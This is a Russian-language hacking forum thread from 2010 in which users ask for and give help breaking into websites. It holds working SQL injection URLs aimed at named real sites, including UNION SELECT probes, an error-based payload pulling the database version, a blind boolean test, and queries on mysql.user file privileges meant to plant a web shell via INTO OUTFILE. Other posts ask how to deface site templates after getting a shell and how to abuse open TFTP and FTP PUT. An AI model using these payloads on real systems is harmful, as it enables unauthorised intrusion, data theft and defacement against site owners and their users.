Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ну ну...некоторые не зальют...
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Обьясните как правильно шелл можно залить, что то не получается
     
    _________________________
  3. shuba

    shuba Elder - Старейшина

    Joined:
    22 May 2009
    Messages:
    593
    Likes Received:
    129
    Reputations:
    52
    Ты через админку или как?
     
    1 person likes this.
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    через такой запрос я по логике должен залить шелл по адресу /var/www/html/1.php
    ну не понятно заливается он или нет и п оследущему запросу я пытаюсь вызвать шелл, но опять же ничего не получается(((
    ctacok: into outfile char? :)
    Чарить хексить и т.п. нельзя, только ковычки.
     
    _________________________
    #13984 winstrool, 6 Jul 2010
    Last edited by a moderator: 6 Jul 2010
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    winstrool, нельзя чарить путь в INTO OUTFILE.
    Ctacok, есть такие кнопочки - "Post reply" && "Быстрый ответ" =)
    Ctacok: Я не люблю гадить.

    Какраз таки экранирует =)
     
    #13985 mailbrush, 6 Jul 2010
    Last edited by a moderator: 6 Jul 2010
  6. KypC

    KypC New Member

    Joined:
    4 Jul 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Добрый день! Подскажите пожалуйста, можно ли как-то использовать удаленно через ip открытый порт 69 TFTP?
     
  7. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    http://www.portugal-tchat.com/host_mes_images/view/870+union+select+1,2,3,4,5,6,7,8,9,10,11

    подскажите, куды копать дальше?
     
  8. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    URL уязвима

    но я не могу найти число столбцов

    http://www.team-dignitas.org/index.php?id=10104
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    крути как слепую..в ошибке указанно почему не можешь найти количество столбцов


    http://www.team-dignitas.org/index.php?id=10104'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+news+group+by+2+limit+1)a)--+

    By Pashkela
     
    #13989 Gorev, 6 Jul 2010
    Last edited: 6 Jul 2010
  10. shuba

    shuba Elder - Старейшина

    Joined:
    22 May 2009
    Messages:
    593
    Likes Received:
    129
    Reputations:
    52
    Помойму это не скуль! :eek:
     
  11. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    Как вариант...
    http://www.portugal-tchat.com/host_mes_images/view/870+and+if(mid(version(),1,1)=5,1,(select+1+union+select+2))

    Условие выполняется - картинка, не выполняется - error.
    Возможно все гораздо проще можно сделать...
     
  12. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Ребята, подскажи по поводу использования UPDATE в инъекциях.
    Значит есть инъекция
    UNION+SELECT+1,test_data,3+FROM+test_table+--+
    пробую изменить значение test_data допустим на 12345 вот таким запросом
    UNION+UPDATE+test_table+SET+test_data='12345'+WHERE+test_data2='lol'+--+
    в результате выбивает ошибку вида
    пробовал заменять значение на HEX кодировку, то есть вместо ='12345' тулил =0x3132333435. Результат - опять таки ошибка.
    Подскажите, может быть я не так использую UPDATE, и всё дело в неправильном синтаксисе? Заранее благодарен.
     
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Если запрсос select, значит SELECT, нельзя insert, update, и т.п., можно только выборку из бд делать.
     
    1 person likes this.
  14. firstq2

    firstq2 New Member

    Joined:
    4 Jul 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    А если у нас основной запрос вроде INSERT+INTO+test_table+(test_data)+VALUES+(lol), то UNION INSERT или UNION UPDATE прокатит?
     
  15. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Нет. Вы вообще вкурсе что делает union?
     
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    мдяс, думаю на лето надо закрыть данный раздел..так как 99% вопросы по скулям..причем стандартные вопросы, ответы на которые можно спокойно найти на форуме потратив 30 секунд
     
  17. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    Этот сайт позволяет file_priv, но мы можем заполнить оболочку?
    http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,file_priv,3,4,5,6,7,8,9%20from%20mysql.user+--+
     
  18. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    как получив шелл на фтп, можно заменить все шаблоны в БАЗЕ данных на вредноносный код(дефейс)?
     
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    У твоего пользователя нету file_priv:
    Code:
    http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9+--+
    Получаем юзера - DCE. Смотрим дальше:
    Code:
    http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,concat_ws(0x3a,user,file_priv),'3',4,5,6,7,8,9%20from%20mysql.user+limit+5,1+--+
    Результат:
    Code:
    DCE:N
     
    1 person likes this.
  20. MAQUEEN

    MAQUEEN RadioActivity

    Joined:
    27 Sep 2008
    Messages:
    422
    Likes Received:
    126
    Reputations:
    32
    как использовать " PUT " уязвимость, в FTP ?..... (удаленный сервер)
     
Thread Status:
Not open for further replies.